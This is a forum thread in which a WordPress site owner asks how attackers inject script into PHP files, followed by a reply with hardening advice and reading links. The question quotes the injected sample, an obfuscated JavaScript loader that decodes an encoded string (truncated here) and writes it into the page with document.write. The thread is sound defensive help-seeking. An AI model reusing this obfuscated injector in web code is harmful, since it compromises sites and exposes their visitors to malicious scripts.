How Attackers write script into my php files?

I have a blog created with wordpress, now i have a problem. Attackers writes javascript codes into my files.

Let’s assume i have holes in my plugin scripts, but how can they write into php files?

here is part of the list of php files, in which they write the script
(index.php, wp-activate.php, wp-comments-post.php, wp-settings.php ...)

and this is the javascript they write into

<script type="text/javascript" language="javascript">kxjwm="225222 ... 2";madds=100;wljam=this;cjayr="i"+"te";geijt=116;fsmuj="wr"+cjayr;for(yadii in wljam){if(yadii.length==8 && yadii.charCodeAt(0)==madds && yadii.charCodeAt(7)==geijt){break;}}o="";bqcqp=0;qczew=wljam[yadii];dlhge=53;while (bqcqp<kxjwm.length){voxhw=0;for(evedn=0;evedn<8;evedn++){voxhw=voxhw<<1;if(kxjwm.charCodeAt(bqcqp+evedn)==dlhge){voxhw++;}}bqcqp=bqcqp+3;qczew[fsmuj](String.fromCharCode(voxhw));bqcqp=bqcqp+5;}</script>

How can i prevent such attacks?

I haven’t any experience with wordpress, so any help will be very nice.

Thanks much

Hi @Syom:

Often hackers get access because you use the name “admin” for your administrator and you have an easy to hack password. Or because you don’t update your software and they leverage some of the security holes that have been found and patched.

Here’s a set of slides that go indepth to explaining how to secure your WordPress site that were just presented at WordCamp Phoenix this past weekend:

• WordPress End-User Security

Here are some blog posts by Otto on the subject:

• How to find a backdoor in a hacked WordPress
• Anatomy of a Theme Malware